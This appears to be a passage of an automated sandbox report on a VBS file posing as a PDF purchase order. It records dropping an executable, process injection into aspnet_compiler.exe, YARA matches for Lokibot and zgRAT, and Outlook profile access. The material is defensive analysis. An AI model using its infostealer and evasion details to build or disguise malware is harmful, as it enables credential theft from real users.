                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ntmarta.dllJump to behavior
                          Source: 2.0.x.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 0.2.wscript.exe.1a474030090.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                          Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                          Source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                          Source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                          Source: C:\Users\user\AppData\Local\Temp\x.exe, type: DROPPEDMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                          Source: x.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.csCryptographic APIs: 'CreateDecryptor'
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@7/5@1/1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,4_2_0040434D
                          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                          Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
                          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs"
                          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsVirustotal: Detection: 21%
                          Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsReversingLabs: Detection: 31%
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs"
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                          Source: Binary string: aspnet_compiler.pdb source: 31437F.exe.4.dr
                          Source: Binary string: GenPo.pdb source: wscript.exe, 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257357620.000001A4739C2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, x.exe.0.dr
                          Source: Binary string: BATMAN.pdb source: x.exe, 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2279959470.0000000004920000.00000004.08000000.00040000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user\AppData\Local\Temp\x.exe");
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, uvSfho6ElWCYG2yBh2.cs.Net Code: uvS6fhoEl System.Reflection.Assembly.Load(byte[])
                          Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.x.exe.338d2a8.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.x.exe.23954fc.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.x.exe.338d2a8.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2278008968.000000000338D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: x.exe PID: 7020, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4596, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_049561C3 push edx; retf 2_2_049561C9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AD4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00402AC0 push eax; ret 4_2_00402AFC
                          Source: x.exe.0.drStatic PE information: section name: .text entropy: 7.463409382796708
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, kKoaNC00Ilsuv7h0CH.csHigh entropy of concatenated method names: 'W1Z6rGS9Cp', 'jmk6pX9mn1', 'rdX6OetmIV', 'dxB6WTalQ3', 'MCt6KnfaP1', 'gZe6w5JcVp', 'CRi6aGHNAf', 'Hi26Jvp82g', 'sSB6dy35sK', 'faH67UVfQ0'
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, dTiqlv6ebNOXLCuMMeh.csHigh entropy of concatenated method names: 'mHsZiWSvdd', 'KDikMXewCI', 'EeMZpXgGRt', 'aZRZOsZ8By', 'nVoZWo3dMo', 'WCaZKMLDIj', 'RVjpgCtcIp9eh', 'jUXLZN1y8q', 'rl1L8Nvwr4', 'aBrLHVrwnF'
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, M8ewUqfMiP073xJLFb.csHigh entropy of concatenated method names: 'WU6sPGG7Rc', 'OAesufhHfC', 'WLusNQPPVZ', 'wMlsjM6pYD', 'lF7so6ieNU', 'EBssgrp6Bx', 'xUWsTugHNY', 'jrGsmX2MnG', 'KDikMXewCI', 'kQTsyOHdt2'
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, esHgDhcomPxhQnZHrD.csHigh entropy of concatenated method names: 'BOeqBsSnWY', 'Bk1qA1ERtl', 'Ywg65cnyQ3', 'VQY6hkmY6N', 'few6fUqMiP', 'j736VxJLFb', 'MaQ627DWPg', 'mGs6vVmyBi', 'Or66YWWVIZ', 'Opr6zCVWWs'
                          Source: 0.2.wscript.exe.1a474030090.0.raw.unpack, Form1.csHigh entropy of concatenated method names: 'Dispose', 'yuRFaNFch', 'WMKDAag7F', 'KwOCm9a1r', 'hnuE92Fqk', 'z4iGxTVdc', 'J9rxfGWhf', 'eSaBRQ9vW', 'lO4A7BX7J', 'r4beKoaNC'
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, mD28mrtr0YjvUb1q9C.csHigh entropy of concatenated method names: 'eeZC8eaaVnmWw', 'xGvadPcGk31YRbMSyws', 'mXAgVicSkYvnW59wLfe', 'llZbGZc2sYbSeeTEjmR', 'P2yKxlcqr5o1K3V0trs', 'FcnGB6chyjLxTUPOb3s', 'v9pmKAclQ3xFkLILsWU'
                          Source: 2.2.x.exe.23954fc.1.raw.unpack, BATMAN.csHigh entropy of concatenated method names: 's2eaZduS9', 'zPYmVBYvk', 'k5sOblnTY', 'xo1CfM32Z', 'LBDIpE0Dv', 'yPm6fCuE8', 'wqK4jOCiY', 'koatmoNxT', 'a4UyPyhqG', 'o1L9sNpkD'
                          Source: 2.2.x.exe.4920000.5.raw.unpack, mD28mrtr0YjvUb1q9C.csHigh entropy of concatenated method names: 'eeZC8eaaVnmWw', 'xGvadPcGk31YRbMSyws', 'mXAgVicSkYvnW59wLfe', 'llZbGZc2sYbSeeTEjmR', 'P2yKxlcqr5o1K3V0trs', 'FcnGB6chyjLxTUPOb3s', 'v9pmKAclQ3xFkLILsWU'
                          Source: 2.2.x.exe.4920000.5.raw.unpack, BATMAN.csHigh entropy of concatenated method names: 's2eaZduS9', 'zPYmVBYvk', 'k5sOblnTY', 'xo1CfM32Z', 'LBDIpE0Dv', 'yPm6fCuE8', 'wqK4jOCiY', 'koatmoNxT', 'a4UyPyhqG', 'o1L9sNpkD'
                          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Users\user\AppData\Roaming\188E93\31437F.exeJump to dropped file
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
